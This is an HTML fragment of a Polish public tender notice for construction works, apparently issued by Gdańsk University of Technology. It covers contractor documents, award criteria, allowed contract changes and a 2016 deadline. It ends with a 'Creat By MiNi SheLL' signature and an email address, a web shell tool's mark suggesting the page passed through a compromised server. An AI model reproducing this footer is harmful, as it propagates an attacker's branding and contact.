<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opcjonalnie -pisemne zobowiązania podmiotów oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia -w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków lub inny dokument.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji robót - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może być dokonana tylko za zgodą obu Stron.
Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu Stron. 
Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru wykonawcy, dotyczących:
1.	terminu
Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie w przypadku wystąpienia jednej z niżej wymienionej okoliczności pod warunkiem, że ma ona wpływ na termin
realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
1)	przestojów i opóźnień zawinionych przez Zamawiającego,
2)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne zdarzenia losowe) nieprzewidziane i niemożliwe do uniknięcia
3)	konieczności oczekiwania na wprowadzenie przez projektanta korekt i uściśleń w rozwiązaniach projektowych,
4)	konieczności oczekiwania na wprowadzenie przez projektanta sprawującego nadzór autorski korekt i uściśleń w rozwiązaniach projektowych,
5)	ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód formalno-prawnych,
6)	realizacji robót dodatkowych, zamiennych lub zaniechania części robót,
7)	przerw lub przestojów w realizacji robót budowlanych wynikających z przyczyn nieleżących po stronie Wykonawcy.
W okolicznościach wyżej wymienionych Strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
Wydłużenie okresu obowiązywania umowy nakłada na wykonawcę obowiązek przedłużenia  terminu ważności zabezpieczenia należytego wykonania umowy, z zachowaniem ciągłości zabezpieczenia i jego wymaganej wysokości. 
Przesunięcie terminu wykonania umowy nakłada na Wykonawcę obowiązek przedłużenia okresu ważności zabezpieczenia należytego wykonania umowy oraz okresu ważności umowy ubezpieczenia.
2. 	zakresu i wartości umowy
Powodem wprowadzenia zmian w zakresie i wartości umowy mogą być roboty zamienne lub zaniechane. 
Wprowadzenie robót zamiennych jest możliwe jeśli:
1)	jest korzystne dla zamawiającego na etapie realizacji umowy lub przyniesie korzystne skutki                       w trakcie eksploatacji przedmiotu umowy, 
2)	stało się konieczne na skutek ujawnienia się przeszkód w gruncie, lub błędów                            w dokumentacji projektowej,
3)	pozwolą osiągnąć lepsze parametry techniczne, użytkowe, estetyczne od przyjętych                       w  dokumentacji projektowej, 
4)	dotyczą zastosowania nowych technologii nieznanych Zamawiającemu i niedostępnych                         w momencie zawarcia umowy,
5)	zleconych robót dodatkowych.
Realizacja robót zamiennych w stosunku do określonych w umowie, musi być wywołana czynnikami obiektywnymi związanymi z tą realizacją tj. niezależnymi od Wykonawcy, związanymi z koniecznością wprowadzenia zmian warunkujących realizację prac zgodnie ze sztuką budowlaną, nie powodującymi rozszerzenia przedmiotu zamówienia określonego w dokumentacji projektowej ani wynagrodzenia wykonawcy. 
Wprowadzenie robót zaniechanych jest możliwe jeśli:
1)	są one następstwem zleconych robót zamiennych lub dodatkowych,
2)	konieczność rezygnacji z tych robót jest niezbędna dla prawidłowego wykonania przedmiotu umowy,
3)	zaistniały istotne zmiany okoliczności powodujące, że wykonanie części robót nie leży                     w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy. 
	Wartość robót zaniechanych zostanie ustalona na podstawie cen z kosztorysu Wykonawcy.
3.  	zmiany stawki VAT
Wynagrodzenie Wykonawcy może ulec zmianie w przypadku obniżenia lub podwyższenia stawki podatku VAT na skutek zmiany obowiązujących przepisów. 
Płatność będzie się odbywać z uwzględnieniem stawki VAT obowiązującej w dniu wystawienia faktury.
Wykonawca może dokonywać zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującą nową osobę.  
W przypadku zmiany osoba, która będzie uczestniczyć w wykonywaniu zamówienia, musi posiadać  kwalifikacje i doświadczenie, jakie posiadają osoby wskazane w ofercie. 
Wykonawca musi z własnej inicjatywy zaproponować zastępstwo w przypadku śmierci, choroby lub wypadku lub innej przyczyny wyłączającej możliwość pracy którejkolwiek z osób. 
Zamawiający może żądać zmiany, jeżeli w jego opinii osoba ta jest nieefektywna lub nie wywiązuje się z obowiązków wynikających z Umowy.
5.  	zmiany lub rezygnacji z Podwykonawcy 
Wykonawca może dokonać zmiany lub zrezygnować z Podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1,  Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca (lub Wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Obowiązek wykazania powyższych okoliczności w sposób nie budzący wątpliwości Zamawiającemu spoczywa na Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zarządzania i Ekonomii Politechniki Gdańskiej, Gdańsk, ul. G. Narutowicza 11/12,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2016 godzina 10:00, miejsce: Wydział Zarządzania i Ekonomii Politechniki Gdańskiej, Gdańsk, ul. G. Narutowicza 11/12, pok. 518.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com